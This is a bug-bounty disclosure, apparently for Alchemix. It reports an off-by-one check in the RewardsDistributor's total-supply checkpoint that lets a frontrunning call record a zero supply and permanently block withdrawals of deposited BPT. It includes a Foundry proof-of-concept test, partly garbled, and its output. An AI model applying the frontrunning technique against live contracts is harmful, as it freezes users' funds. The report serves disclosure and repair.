31076 - [SC - Critical] checkpointTotalSupply can checkpoint before a t...

Submitted on May 12th 2024 at 10:57:42 UTC by @Holterhus for Boost | Alchemix

Report ID: #31076

Report type: Smart Contract

Report severity: Critical

Target: https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/RevenueHandler.sol


  • Permanent freezing of funds



The checkpointTotalSupply() function is in the RewardsDistributor and is callable by anyone. The function has an incorrect comparison of > instead of >=, and this can lead to a checkpoint being recorded when a timestamp is not yet complete. This leads to mistakes in the internal accounting. In the worst case, a user can never successfully claim() again, which permanently freezes their BPT tokens that have been deposited into veALCX.

Vulnerability Details

The implementation of _checkpointTotalSupply() is as follows:

function _checkpointTotalSupply() internal {
    address ve = votingEscrow;
    uint256 t = timeCursor;
    uint256 roundedTimestamp = (block.timestamp / WEEK) * WEEK;

    for (uint256 i = 0; i < 20; i++) {
        if (t > roundedTimestamp) {
        } else {
            veSupply[t] = IVotingEscrow(ve).totalSupplyAtT(t);
        t += WEEK;
    timeCursor = t;

Notice that whenever veSupply[t] is assigned to a value, the t += WEEK increment happens immediately after, which permanently progresses the cursor so that veSupply[t] will never be assigned to again. Also, notice that the veSupply[t] assignment is only skipped if t > roundedTimestamp. This is incorrect. It should also be skipped if t == roundedTimestamp, otherwise this code can record the totalSupplyAtT() value before the timestamp itself is complete. This means the check should actually be: if (t >= roundedTimestamp).

Impact Details

In the scenario when t == roundedTimestamp, the code will incorrectly cache the totalSupplyAtT() of the current timestamp early. Any actions taken in veALCX after this (but on the same timestamp) will not be reflected in the veSupply[] value. On the other hand, the _claimable() function will correctly account for these last-second actions in each individual tokenId. As a result, it is possible for the balanceOf value below to contain deposits that did not contribute to the veSupply[weekCursor] value:

if (balanceOf != 0) {
    toDistribute += (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor]

In the worst-case scenario, the first user of VotingEscrow can end up in a situation where veSupply[weekCursor] == 0 and balanceOf > 0. In this case, the claim() function will revert due to a division by zero, and it will permanently fail to progress past the broken week.

Since the withdraw() function in the veALCX contract has the following code:

IRewardsDistributor(distributor).claim(_tokenId, false);

it will always revert on this line, and users will be in a state where they are permanently unable to withdraw their BPT tokens. See the PoC for an example.


See the PoC below.

Proof of Concept

I have created the following test file and added it to the tests/ directory:

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.15;

import "./BaseTest.sol";

contract CheckpointBugTest is BaseTest {

    address victim = admin;

    constructor() {

    function testCheckpointTotalSupplyBugFreezing() public {

        uint256 ts = ((block.timestamp + 1 weeks) / 1 weeks) * 1 weeks;

        // If a victim is about to deposit, frontrunning and checkpointing them 
        // will store `veSupply[ts] == 0`. This is especially a risk if block builders
        // aren't currently accepting the victim tx's priority fee, so there's a large window
        // of time where the user's tx is in the mempool but not on-chain. This may also just
        // happen by accident.
        uint256 tokenId = createVeAlcx(victim, TOKEN_100K, MAXTIME, false);

        console.log("The following state implies that `claim()` will permanently divide by 0:");
        console.log("ts", ts);
        console.log("distributor.timeCursor()", distributor.timeCursor());
        console.log("distributor.veSupply(ts)", distributor.veSupply(ts));
        console.log("veALCX.totalSupplyAtT(ts)", veALCX.totalSupplyAtT(ts));





        hevm.warp(block.timestamp + 1 weeks);

        // Now their BPT is permanently stuck since all calls to `claim()` will revert due to
        // a division by 0. It shouldn't have allowed `veSupply[ts] == 0` to be checkpointed
        // because the timestamp wasn't over yet.


Running the command forge test -vvv --match-test testCheckpointTotalSupplyBugFreezing --rpc-url $ETH_RPC_URL gives the following result:

[PASS] testCheckpointTotalSupplyBugFreezing() (gas: 25610541)
  The following state implies that `claim()` will permanently divide by 0:
  ts 1715817600
  distributor.timeCursor() 1716422400
  distributor.veSupply(ts) 0
  veALCX.totalSupplyAtT(ts) 199452054794520538483200

which shows that the user's attempt to call withdraw() indeed reverts and their deposited BPT tokens are permanently frozen.

Last updated

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